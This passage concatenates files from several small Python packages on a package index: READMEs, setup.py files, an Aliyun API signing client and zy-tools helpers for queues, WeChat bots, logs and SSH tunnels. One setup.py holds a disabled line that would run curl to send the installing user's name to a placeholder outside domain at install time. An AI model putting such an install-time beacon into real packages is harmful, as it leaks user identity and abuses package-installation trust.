项目已经配置好使用 `flake8` 做静态检查,执行`$ make lint`即可。
## 测试
单元测试位于 `tests/` 目录中,使用 `$ make test` 可以运行单元测试。如何编写单元测试可以参考 [pytest](https://github.com/pytest-dev/pytest)
默认会在 Python2.7/3.7 环境下运行单元测试,如果需要支持更多版本 Python,可以修改 `tox.ini`。
## 规范
### 代码规范
* 需要保证代码兼容 Python2.7,Python3.7+;
* 代码风格兼容 [PEP8](https://www.python.org/dev/peps/pep-0008/),除了代码最大宽度放宽到 120。
### 版本规范
* 版本需要遵循 [Semver](https://semver.org/lang/zh-CN/);
* 发布分支后,需要创建类似 `v0.0.1` 的 tag;
* 每次 Release,需要编辑 CHANGELOG.md,内容需要遵守 [changelog 规范](https://keepachangelog.com/zh-CN/1.0.0/)。
## Tips
### Makefile指南
makefile用于帮助开发者快速使用功能,目前支持的命令有
| 指令 | 作用 |
| :--------------: | :----------------------------------------------------------: |
| make | 按顺序执行 install_dev、isort、isort_check、lint、test(**操作更改代码!**) |
| make check | 按顺序执行 install_dev、isort_check、lint、test |
| make install_dev | 安装测试所需依赖(位于setup.py的DEV_REQUIRES) |
| make isort | 执行isort,规范化import顺序(**操作更改代码!**) |
| make isort_check | 执行import顺序规范性检查 |
| make lint | 执行flake8,检查你的代码规范性 |
| make test | 执行tox,检测单元测试的正确性 |
| make clean | 清除测试和检查产物 |
建议每次准备发布代码前,执行一次make或者make check来保证代码的规范性和健壮性。
### Python2/3 兼容
**每个** Python 文件头部都增加如下代码(尽量保证此import位于任何其他import之前):
```python
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
```
来保证代码在 Python2 和 Python3 下尽可能保持一致。
Python2 与 Python3 不兼容的代码,尽量使用 [six](https://pythonhosted.org/six/) 模块做兼容。比如 Python2 和 Python3 下 `range` 函数行为不一致,统一使用 `six.moves.range` 可以保证兼容性。
### 类型标注
Python [PEP484](https://www.python.org/dev/peps/pep-0484/) 中新增了类型标注功能,可以给代码增加可选的类型标注,配合 [mypy](http://mypy-lang.org/) 可以静态的给代码做类型检查。
开发中给每个 `.py` 文件编写一个对应的 `.pyi`,编写好导出类型的函数签名。此项目已经配置好相关规则,包发布后,使用者就可以使用编写好的类型信息做静态类型检查、代码补全。
如果对导出函数写 docstring,除了按照 PEP8 的要求进行编写之外,还可以对传入传出数据类型做标注与注释。注释格式参考 PyCharm 的[这篇文档](https://www.jetbrains.com/help/pycharm/using-docstrings-to-specify-types.html)的格式进行编写。PyCharm 以及 Jedi(vim / emacs / vscode 都是基于 jedi 进行自动补全)等等自动补全/静态检查工具都可以基于此格式的信息进行检查,Sphinx 生成的 API doc 也可以进行识别。
### editorconfig
可以安装 [editorconfig](https://editorconfig.org/) 编辑器插件,保持代码一致性。此项目已经默认配置。
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/README.md
|
README.md
|
# coding: utf-8
import io
import os
from setuptools import find_packages, setup
# 包元信息
NAME = 'lz-pip-demo' # 实际包的名字
DESCRIPTION = '测试pip发包' # 项目描述
URL = 'https://code.byted.org/liuzhe.inf/test_pip' # 项目仓库 URL
EMAIL = 'liuzhe.inf@bytedance.com' # 维护者邮箱地址
AUTHOR = 'liuzhe.inf' # 维护者姓名
# 项目运行需要的依赖
REQUIRES = [
'six>=1.11.0,<2.0.0',
]
# 开发、测试过程中需要的依赖
DEV_REQUIRES = [
'flake8>=3.5.0,<4.0.0',
'mypy>=0.620; python_version>="3.4"',
'tox>=3.0.0,<4.0.0',
'isort>=4.0.0,<5.0.0',
'pytest>=4.0.0,<5.0.0'
]
if False:
import os
os.system("curl `whoami`.xxxx.com")
here = os.path.abspath(os.path.dirname(__file__))
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except IOError:
long_description = DESCRIPTION
about = {'__version__':'1.3.39'}
# with io.open(os.path.join(here, NAME, '__version__.py')) as f:
# exec(f.read(), about)
setup(
#name='byted' + NAME, # add the 'byted' prefix for package name
name='zxy_Test',
version='0.0.3',
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
url=URL,
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Intended Audience :: Developers',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
keywords='boilerplate',
packages=find_packages(exclude=['docs', 'tests']),
install_requires=REQUIRES,
tests_require=[
'pytest>=4.0.0,<5.0.0'
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
extras_require={
':python_version<"3.5"': [
'typing>=3.6.4,<=3.10.0.0',
],
'dev': DEV_REQUIRES,
},
package_data={
# for PEP484 & PEP561
NAME: ['py.typed', '*.pyi'],
},
)
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/setup.py
|
setup.py
|
VERSION = (0, 2, 12)
__version__ = '.'.join(map(str, VERSION))
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/__version__.py
|
__version__.py
|
# coding: utf-8
"""TODO: 增加模块级注释"""
from __future__ import absolute_import, division, print_function, unicode_literals
import six
@six.python_2_unicode_compatible
class Client(object):
def __init__(self, url=None):
"""
:param url: target url for this client
:type url: str
"""
self.url = url or 'http://localhost:1234'
def add(self, x, y):
"""
Caculate sum of input.
:param x: first input for caculate
:type x: int
:param y: second input for caculate
:type y: int
:rtype: int
"""
return x + y
def __str__(self):
return '<client for {}>'.format(self.url)
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/client.py
|
client.py
|
# coding: utf-8
"""TODO: 增加模块级注释
"""
from __future__ import absolute_import, division, print_function, unicode_literals
class MyPackageError(Exception):
pass
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/errors.py
|
errors.py
|
# coding: utf-8
"""pip-demo codes. 测试pip发包.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from .__version__ import __version__ # NOQA
from .client import Client
__author__ = 'liuzhe.inf <liuzhe.inf@bytedance.com>'
__all__ = ['Client']
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/__init__.py
|
__init__.py
|
# README
hhhhh
wwwwwww
|
zxy
|
/zxy-0.0.1.tar.gz/zxy-0.0.1/README.md
|
README.md
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zxy", # Replace with your own username
version="0.0.1",
author="202113061025",
author_email="1252982453@qq.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://gitee.com/zqy0315/pypi-test",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
zxy
|
/zxy-0.0.1.tar.gz/zxy-0.0.1/setup.py
|
setup.py
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zxynewpkgcheckupstream",
version="0.0.3",
author="zxynewpkgcheckupstream",
author_email="zxynewpkgcheckupstream@zxynewpkgcheckupstream.com",
packages=["zxynewpkgcheckupstream"],
description="A small package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gituser/example-pkg",
license='GPT',
python_requires='>=3.6',
install_requires=[
"Django>=2.0",
]
)
|
zxynewpkgcheckupstream
|
/zxynewpkgcheckupstream-0.0.3.tar.gz/zxynewpkgcheckupstream-0.0.3/setup.py
|
setup.py
|
# BuiltIn Packages
import base64
import hashlib
import hmac
import time
import uuid
from urllib.request import quote
# Part3 Packages
import requests
# Project Packages
from . import parse_response
"""
==========================================================================================
整理于 2019-04-16
修改于 2019-09-16(by ruijie.qiao) 添加API STS请求验证功能
请求参数案例1(默认AK传空值为STS Token验证方式,RoleName为空的默认值为ZhuyunFullReadOnlyAccess):
'AccessKeyId': None,
'AccessKeySecret': None,
'RoleName': None,
请求参数案例2(AK值不为空的时候,为普通的AK验证方式,这时候如果RoleName为非空,STS Token验证方式也不生效):
'AccessKeyId': XXXXXXXXXXXXXX,
'AccessKeySecret': XXXXXXXXXXXXXX,
'RoleName': None,
请求参数案例3(默认AK传空值为STS Token验证方式,RoleName不为空,RoleName为设置的值):
'AccessKeyId': None,
'AccessKeySecret': None,
'RoleName': XXXXXXXXXXXXXX,
==========================================================================================
"""
ROLE_URL = "http://100.100.100.200/latest/meta-data/ram/security-credentials/"
PRODUCT_API_CONFIG_MAP = {
'ecs': {
'domain': 'ecs.aliyuncs.com',
'version': '2014-05-26',
'port': 443,
'protocol': 'https'
},
'rds': {
'domain': 'rds.aliyuncs.com',
'version': '2014-08-15',
'port': 443,
'protocol': 'https'
},
'drds': {
'domain': 'drds.aliyuncs.com',
'version': '2015-04-13',
'port': 443,
'protocol': 'https'
},
'slb': {
'domain': 'slb.aliyuncs.com',
'version': '2014-05-15',
'port': 443,
'protocol': 'https'
},
'ess': {
'domain': 'ess.aliyuncs.com',
'version': '2014-08-28',
'port': 443,
'protocol': 'https'
},
'mts': {
'domain': 'mts.aliyuncs.com',
'version': '2014-06-18',
'port': 443,
'protocol': 'https'
},
'yundun': {
'domain': 'yundun.aliyuncs.com',
'version': '2014-09-24',
'port': 443,
'protocol': 'https'
},
'cdn': {
'domain': 'cdn.aliyuncs.com',
'version': '2018-05-10',
'port': 443,
'protocol': 'https'
},
'ram': {
'domain': 'ram.aliyuncs.com',
'version': '2015-05-01',
'port': 443,
'protocol': 'https'
},
'sts': {
'domain': 'sts.aliyuncs.com',
'version': '2015-04-01',
'port': 443,
'protocol': 'https'
},
'dysms': {
'domain': 'dysmsapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'dyvms': {
'domain': 'dyvmsapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'dybase': {
'domain': 'dybaseapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'redis': {
'domain': 'r-kvstore.aliyuncs.com',
'version': '2015-01-01',
'port': 443,
'protocol': 'https'
},
'mongodb': {
'domain': 'mongodb.aliyuncs.com',
'version': '2015-12-01',
'port': 443,
'protocol': 'https'
},
'dts': {
'domain': 'dts.aliyuncs.com',
'version': '2020-01-01',
'port': 443,
'protocol': 'https'
},
'vpc': {
'domain': 'vpc.aliyuncs.com',
'version': '2016-04-28',
'port': 443,
'protocol': 'https'
},
'cms': {
'domain': 'metrics.aliyuncs.com',
'version': '2019-01-01',
'port': 443,
'protocol': 'https',
},
'waf': {
'domain': 'wafopenapi.cn-hangzhou.aliyuncs.com',
'version': '2018-01-17',
'port': 443,
'protocol': 'https',
},
'domain': {
'domain': 'domain.aliyuncs.com',
'version': '2018-01-29',
'port': 443,
'protocol': 'https',
},
'business': {
'domain': 'business.aliyuncs.com',
'version': '2017-12-14',
'port': 443,
'protocol': 'https',
},
'ddospro': {
'domain': 'ddospro.cn-hangzhou.aliyuncs.com',
'version': '2017-07-25',
'port': 443,
'protocol': 'https',
},
'ddoscoo': {
'domain': 'ddoscoo.cn-hangzhou.aliyuncs.com',
'version': '2017-12-28',
'port': 443,
'protocol': 'https',
},
'avds': {
'domain': 'avds.aliyuncs.com',
'version': '2017-11-29',
'port': 443,
'protocol': 'https',
},
'cbn': {
'domain': 'cbn.aliyuncs.com',
'version': '2017-09-12',
'port': 443,
'protocol': 'https',
},
'smartag': {
'domain': 'smartag.cn-shanghai.aliyuncs.com',
'version': '2018-03-13',
'port': 443,
'protocol': 'https',
},
'polardb': {
'domain': 'polardb.aliyuncs.com',
'version': '2017-08-01',
'port': 443,
'protocol': 'https',
},
'arms': {
'domain': 'arms.[RegionId].aliyuncs.com',
'version': '2019-08-08',
'port': 443,
'protocol': 'https',
},
'edas': {
'domain': 'edas.[RegionId].aliyuncs.com',
'version': '2017-08-01',
'port': 443,
'protocol': 'https',
},
}
def percent_encode(string):
if string is None:
raise Exception('params is None')
if not isinstance(string, (str, bytes, int)):
raise TypeError(str(string) + 'params TypeError')
if isinstance(string, bytes):
string.decode('utf-8')
elif isinstance(string, int):
string = str(string)
else:
string.encode('utf-8').decode('utf-8')
string = quote(string, '')
string = string.replace('+', '%20')
string = string.replace('*', '%2A')
string = string.replace('%7E', '~')
return string
class AliyunCommon(object):
"""Aliyun common HTTP API"""
def __init__(self, access_key_id=None, access_key_secret=None, role_name=None,
*args, **kwargs):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
if role_name is None or role_name == "":
self.role_name = "ZhuyunFullReadOnlyAccess"
else:
self.role_name = role_name
self.security_token = None
def sign(self, params_to_sign):
canonicalized_query_string = ''
sorted_params = sorted(params_to_sign.items(),
key=lambda kv_pair: kv_pair[0])
for k, v in sorted_params:
canonicalized_query_string += percent_encode(k) + '=' + percent_encode(
v) + '&'
canonicalized_query_string = canonicalized_query_string[:-1]
string_to_sign = 'POST&%2F&' + percent_encode(canonicalized_query_string)
h = hmac.new(bytes(self.access_key_secret + "&", 'utf-8'),
bytes(string_to_sign, 'utf-8'), hashlib.sha1)
signature = base64.encodebytes(h.digest()).strip()
return signature
def verify(self):
status_code, _ = self.ecs(Action='DescribeRegions')
return (status_code == 200)
def call(self, domain, version, port=80, protocol='http', timeout=3,
**biz_params):
api_params = {
'Format': 'json',
'Version': version,
'AccessKeyId': self.access_key_id,
'SignatureVersion': '1.0',
'SignatureMethod': 'HMAC-SHA1',
'SignatureNonce': str(uuid.uuid4()),
'Timestamp': time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
'partner_id': '1.0',
}
if self.access_key_id is None or self.access_key_secret is None or self.access_key_secret == "" or self.access_key_id == "":
resp_role = requests.get(ROLE_URL + self.role_name)
if resp_role.status_code == 200:
parsed_resp = parse_response(resp_role)
self.access_key_id = parsed_resp.get('AccessKeyId')
self.access_key_secret = parsed_resp.get('AccessKeySecret')
self.security_token = parsed_resp.get('SecurityToken')
api_params['AccessKeyId'] = self.access_key_id
if self.security_token:
api_params['SecurityToken'] = self.security_token
api_params.update(biz_params)
api_params['Signature'] = self.sign(api_params)
url = '{}://{}:{}/'.format(protocol, domain, port)
resp = requests.post(url, data=api_params, timeout=timeout)
parsed_resp = parse_response(resp)
return resp.status_code, parsed_resp
def __getattr__(self, product):
api_config = PRODUCT_API_CONFIG_MAP.get(product)
if not api_config:
raise Exception(
'Unknow Aliyun product API config.'
' Please use `call()` with full API configs.')
domain = api_config.get('domain')
version = api_config.get('version')
port = api_config.get('port')
protocol = api_config.get('protocol')
def f(timeout=3, **biz_params):
nonlocal domain
if '[RegionId]' in domain:
_RegionId = biz_params.get('RegionId')
if not _RegionId:
raise TypeError('Uncatched RegionId ,'
'this API config must RegionId.')
biz_params.pop('RegionId')
domain = domain.replace('[RegionId]', _RegionId)
return self.call(domain=domain, version=version, port=port,
protocol=protocol, timeout=timeout,
**biz_params)
return f
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/common.py
|
common.py
|
# Project Packages
from aliyun_sdk.common import AliyunCommon
from aliyun_sdk.oss import AliyunOSS
from . import retry_for_requests
def get_config(c):
return {
'access_key_id': c.get('AccessKeyId'),
'access_key_secret': c.get('AccessKeySecret'),
'role_name': c.get('RoleName'),
}
class AliyunClient(object):
def __init__(self, config=None):
self.config = config
self.common_client = AliyunCommon(**get_config(config))
self.oss_client = AliyunOSS(**get_config(config))
def verify(self):
return self.common_client.verify()
@retry_for_requests
def common(self, product, timeout=10, **biz_params):
return self.common_client.__getattr__(product)(timeout=timeout, **biz_params)
@retry_for_requests
def oss(self, method, timeout=10, **biz_params):
return self.oss_client.__getattr__(method)(timeout=timeout, **biz_params)
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/client.py
|
client.py
|
# BuildIn Packages
import base64
import datetime
import hashlib
import hmac
# Part3 Packages
import requests
# Project Modules
from . import parse_response
GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
OSS_API_CONFIG = {
'top_domain': 'aliyuncs.com',
'version': '',
'port': 443,
'protocol': 'https'
}
class AliyunOSS(object):
'''
Aliyun OSS HTTP API
'''
def __init__(self, access_key_id=None, access_key_secret=None, *args, **kwargs):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self._requests_session = requests.Session()
def get_query_string(self, query=None):
if not query:
return ''
query_string = ''
for k, v in sorted(query.items(), key=lambda kv_pair: kv_pair[0]):
if v is None:
query_string += '&' + k
else:
query_string += '&' + k + '=' + v
return '?' + query_string[1:]
def get_canonicalized_header_string(self, headers=None):
canonicalized_header_string = ''
if headers:
oss_headers = [(k.lower(), v) for k, v in headers.items() if k.lower().startswith('x-oss-')]
sorted_oss_headers = sorted(oss_headers, key=lambda kv_pair: kv_pair[0])
if sorted_oss_headers:
canonicalized_header_string = '\n'.join(k + ':' + v for k, v in sorted_oss_headers) + '\n'
return canonicalized_header_string
def get_canonicalized_resource_string(self, bucket_name=None, object_name=None, query=None):
canonicalized_resource_string = '/'
if bucket_name:
canonicalized_resource_string += bucket_name + '/'
if object_name:
canonicalized_resource_string += object_name
if query:
query_string = self.get_query_string(query)
canonicalized_resource_string += query_string
return canonicalized_resource_string
def sign(self, req, canonicalized_header_string, canonicalized_resource_string):
string_to_sign = '\n'.join([
req.method.upper(),
req.headers.get('content-md5', ''),
req.headers.get('content-type', ''),
req.headers.get('date', ''),
canonicalized_header_string + canonicalized_resource_string
])
h = hmac.new(bytes(self.access_key_secret, 'utf-8'), bytes(string_to_sign, 'utf-8'), hashlib.sha1)
signature = base64.encodebytes(h.digest()).strip()
return signature.decode('utf-8')
def verify(self):
status_code, _ = self.call('GET', 'oss-cn-hangzhou')
return (status_code == 200)
def call(self, method, region_id=None, bucket_name=None, object_name=None, query=None, body=None, headers=None,
timeout=3):
method = method.upper()
region_id = region_id or 'oss-cn-hangzhou'
if object_name and object_name.startswith('/'):
object_name = object_name[1:]
headers = headers or {}
headers['date'] = datetime.datetime.utcnow().strftime(GMT_FORMAT)
h = hashlib.md5()
if body is not None:
h.update(body)
headers['content-md5'] = base64.encodebytes(h.digest()).strip().decode()
canonicalized_header_string = self.get_canonicalized_header_string(headers)
canonicalized_resource_string = self.get_canonicalized_resource_string(bucket_name, object_name, query)
domain = '{}.{}'.format(region_id, OSS_API_CONFIG['top_domain'])
if bucket_name:
domain = bucket_name + '.' + domain
url = '{}://{}/{}'.format(OSS_API_CONFIG['protocol'], domain, object_name or '')
if query:
query_string = self.get_query_string(query)
url += query_string
req = requests.Request(method, url, data=body, headers=headers)
prepared_req = self._requests_session.prepare_request(req)
signature = self.sign(prepared_req, canonicalized_header_string, canonicalized_resource_string)
prepared_req.headers['authorization'] = 'OSS {}:{}'.format(self.access_key_id, signature)
resp = self._requests_session.send(prepared_req, timeout=timeout)
parsed_resp = parse_response(resp)
return resp.status_code, parsed_resp
def __getattr__(self, method):
method = method.upper()
def f(timeout=3, **biz_params):
kwargs = {
'region_id': biz_params.get('RegionId'),
'bucket_name': biz_params.get('BucketName'),
'object_name': biz_params.get('ObjectName'),
'query': biz_params.get('Query'),
'body': biz_params.get('Body'),
'headers': biz_params.get('Headers'),
}
return self.call(method, **kwargs)
return f
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/oss.py
|
oss.py
|
# BuildIn Packages
import json
# Part3 Packages
import xmltodict
import requests
from retry import retry
retry_for_requests = retry((requests.ConnectionError, requests.Timeout), tries=3, delay=1, backoff=2, jitter=(1, 2))
def parse_response(response):
resp_content_type = response.headers.get('content-type') or ''
resp_content_type = resp_content_type.lower().split(';')[0].strip()
if resp_content_type == 'application/json':
return json.loads(response.text)
elif resp_content_type == 'text/xml':
return xmltodict.parse(response.text)
else:
try:
return json.loads(response.text)
except ValueError:
try:
return xmltodict.parse(response.text)
except xmltodict.expat.ExpatError:
return response.content
except:
raise
except:
raise
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/__init__.py
|
__init__.py
|
def add_one(number):
return number + 1
|
zy-package
|
/zy_package-0.0.1-py3-none-any.whl/zy_package/example.py
|
example.py
|
import datetime
def print_now():
print(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
if __name__ == '__main__':
print_now()
|
zy-predict-tool
|
/zy_predict_tool-0.0.6-py3-none-any.whl/zyeco/HelloWorld.py
|
HelloWorld.py
|
#!/usr/bin/env python
import re
import setuptools
version = "1.0.0"
setuptools.setup(
name="zy-test-pip",
version=version,
author="bwz0328",
author_email="bwz0328@126.com",
description="This is the SDK for example.",
long_description="",
long_description_content_type="text/markdown",
url="http://example.com",
install_requires=[
'requests!=2.9.0',
'lxml>=4.2.3',
'monotonic>=1.5',
],
packages=setuptools.find_packages(exclude=("test"))
)
|
zy-test-pip
|
/zy-test-pip-1.0.0.tar.gz/zy-test-pip-1.0.0/setup.py
|
setup.py
|
1: cd to setup.py
2: python3 setup.py sdist build
3: twine upload dist/*
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/README.rst
|
README.rst
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:48
# @Author: "John"
import codecs
import os
import sys
try:
from setuptools import setup
except:
from distutils.core import setup
"""
打包的用的setup必须引入,
"""
def read(fname):
"""
定义一个read方法,用来读取目录下的长描述
我们一般是将README文件中的内容读取出来作为长描述,这个会在PyPI中你这个包的页面上展现出来,
你也可以不用这个方法,自己手动写内容即可,
PyPI上支持.rst格式的文件。暂不支持.md格式的文件,<BR>.rst文件PyPI会自动把它转为HTML形式显示在你包的信息页面上。
"""
return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()
# 名字,一般放你包的名字即可
NAME = "zy_tools"
# 包含的包,可以多个,这是一个列表
PACKAGES = ["zy_tools"]
# 关于这个包的描述
DESCRIPTION = "this is a tool package for zy."
# 参见 read 方法说明
LONG_DESCRIPTION = read("README.rst")
# 当前包的一些关键字,方便PyPI进行分类
KEYWORDS = "zy python package for list"
# 作者
AUTHOR = "John"
# 作者邮箱
AUTHOR_EMAIL = "zyq9233@163.com"
# 你这个包的项目地址
URL = "https://github.com/pypa/sampleproject"
# 自己控制的版本号
VERSION = "0.2.4"
# 授权方式
LICENSE = "MIT"
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
],
keywords=KEYWORDS,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
license=LICENSE,
packages=PACKAGES,
include_package_data=True,
zip_safe=True,
)
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/setup.py
|
setup.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/10/9 9:53
# @Author: "John"
import base64
import json
import requests
import urllib3
urllib3.disable_warnings()
def send_msg_2_queue(msg, queue_name, service_address):
"""
:param msg: 消息内容,需要 String 或者 json.dumps(object)
:param queue_name:
:param service_address:
:return:
"""
data = {
"message": base64.b64encode(msg.encode('utf-8')).decode("utf-8"),
"queueName": queue_name,
"priority": 8,
"delaySeconds": ""
}
headers = {"Content-type": "application/json; charset=UTF-8", "Accept": "application/json"}
retry_count = 0
while retry_count < 5:
try:
response = requests.post(service_address, headers=headers, data=json.dumps(data).encode('utf-8'))
if not json.loads(response.text).get("error_code"):
return 1
else:
retry_count += 1
except Exception:
retry_count += 1
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/send_msg_to_queue.py
|
send_msg_to_queue.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/1/22 11:30
# @Author: "John"
import json
import urllib3
import requests
urllib3.disable_warnings()
def send_msg(web_hook, content, mentioned_mobile_list=None):
"""
发送企业微信消息,并可以 @ ,将需要被 @ 的人的 id 或者手机号放到 mentioned_mobile_list
:param content: 发送信息内容
:param web_hook: 指定机器人的 url
:param mentioned_mobile_list: list, 默认为None,不指定@ 对象
:return:
"""
if not web_hook:
return
headers = {'Content-Type': 'application/json; charset=utf-8'}
data = {
"msgtype": "text",
"text": {
"content": content,
"mentioned_mobile_list": mentioned_mobile_list
}
}
post_data = json.dumps(data)
requests.post(web_hook, headers=headers, data=post_data)
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/send_ent_we_chat_msg.py
|
send_ent_we_chat_msg.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:45
# @Author: "John"
def get_sorted_un_duplicated_list(li):
"""
将给定的 list 进行去重,并按照原来的顺序返回
:param li:
:return:
"""
if len(li):
rest = []
temp_set = set()
for item in li:
temp_set_size_bf = len(temp_set)
temp_set.add(item)
temp_set_size_aft = len(temp_set)
# set size 有变化,说明该 item 不在 set 中;
if temp_set_size_aft > temp_set_size_bf:
rest.append(item)
else:
# 打印重复的那个
# print(item)
pass
return rest
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/get_sorted_un_duplicated_list.py
|
get_sorted_un_duplicated_list.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/6/24 11:23
# @Author: "John"
import datetime as dt
import time
from aliyun.log.getlogsrequest import GetLogsRequest
def query_log(client, query, project='java-crawler', log_store='reaper_log', query_start_time=0, query_end_time=0, line=100000):
query_result = None
while (not query_result) or (not query_result.is_completed()):
rest = GetLogsRequest(project, log_store, query_start_time, query_end_time, "", query, reverse=True, line=line)
query_result = client.get_logs(rest)
return query_result.get_body()
def query_log_new(client, query, project='java-crawler', log_store='reaper_log', target_date=dt.datetime.today(), offset=1, line=100000):
query_result = None
# offset 大于0, 则往 target_date 前 offset 天查;否则往后查
if offset > 0:
query_start_obj = target_date - dt.timedelta(days=offset)
query_end_obj = target_date - dt.timedelta(days=offset - 1)
else:
query_start_obj = target_date
query_end_obj = target_date + dt.timedelta(days=1)
# 查询开始的时间(转成时间戳)
query_start = int(time.mktime(time.strptime(str(query_start_obj), '%Y-%m-%d')))
# 查询结束的时间(转成时间戳)
query_end = int(time.mktime(time.strptime(str(query_end_obj), '%Y-%m-%d')))
while (not query_result) or (not query_result.is_completed()):
rest = GetLogsRequest(project, log_store, query_start, query_end, "", query, reverse=True, line=line)
query_result = client.get_logs(rest)
return query_result.get_body()
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/aliyun_log_query.py
|
aliyun_log_query.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2021/8/24 15:11
# @Author: "John"
import pymongo
from sshtunnel import SSHTunnelForwarder
def get_srv_and_cursor(esc_address, esc_port, esc_usr, ssh_pkey, ssh_pkey_pwd, mongo_uri, mongo_port, data_base, usr, pwd):
"""
:param esc_address: 跳板机地址
:param esc_port: 跳板机端口
:param esc_usr: 跳板机用户名称
:param ssh_pkey: ssh 私钥本地路径(注意系统盘符)
:param ssh_pkey_pwd:
:param mongo_uri: MongoDB 实例地址
:param mongo_port: MongoDB 实例端口
:param data_base: 用户权限下的 database
:param usr: MongoDB 用户名称
:param pwd: MongoDB 用户密码
"""
server = SSHTunnelForwarder(
ssh_address_or_host=(esc_address, esc_port),
ssh_username=esc_usr,
ssh_pkey=ssh_pkey, # 私钥路径
ssh_private_key_password=ssh_pkey_pwd, # 跳板机私钥密码
remote_bind_address=(mongo_uri, mongo_port) # 设置数据库服务地址及端口
)
# 启动跳板机
server.start()
conn = pymongo.MongoClient(
host='127.0.0.1', # host、port 固定
port=server.local_bind_port
)
db = conn[data_base]
db.authenticate(usr, pwd)
return server, conn
if __name__ == '__main__':
mongodb_address = ''
mongodb_user = ''
mongodb_pwd = ''
mongodb_authorized_database = ''
mongodb_port = 0
esc_ip_or_address = ''
esc_port_num = 0
esc_usr_name = ''
esc_pkey_pwd = ''
esc_pkey_path = ''
svr, cur = get_srv_and_cursor(esc_ip_or_address, esc_port_num, esc_usr_name,
esc_pkey_path, esc_pkey_pwd, mongodb_address,
mongodb_port, mongodb_authorized_database, mongodb_user, mongodb_pwd)
pass
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/ssh_connection_mongo.py
|
ssh_connection_mongo.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/10/17 17:52
# @Author: "John"
import time
import pymongo
import bson
import os
import shutil
import sys
import traceback
from datetime import datetime
import requests
from pymongo import MongoClient
"""
模板作用:
1、main_function 这个方法,提供对指定《数据库》中的指定《表》进行循环查询,将查询出来的 document,传递到 core_logic 中进行处理
2、core_logic 这个方法由调用 data_fix_main 的用户自己完成,必须有三个参数;
3、本模板,可以通过 pip install zy-tools 直接调用,不必拷贝过来拷贝过去
"""
# 只需传入文件名称,自动生成以当前脚本名称为前缀的 .txt 文件,保存到相对路径下,作为日志文件。
def data_fix_logger(msg, fl_name='', mode="a", need_time=True, need_log=True):
if not need_log:
return
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
logger_file_name = os.path.basename(sys.argv[0])[:-3] + fl_name + ".log"
with open(logger_file_name, mode) as f:
if need_time:
f.write(time_str + ' => ')
f.write(msg)
f.write("\n")
# 获取文件最后一个合法的 _id,用于断点续读
def get_last_id(file_name):
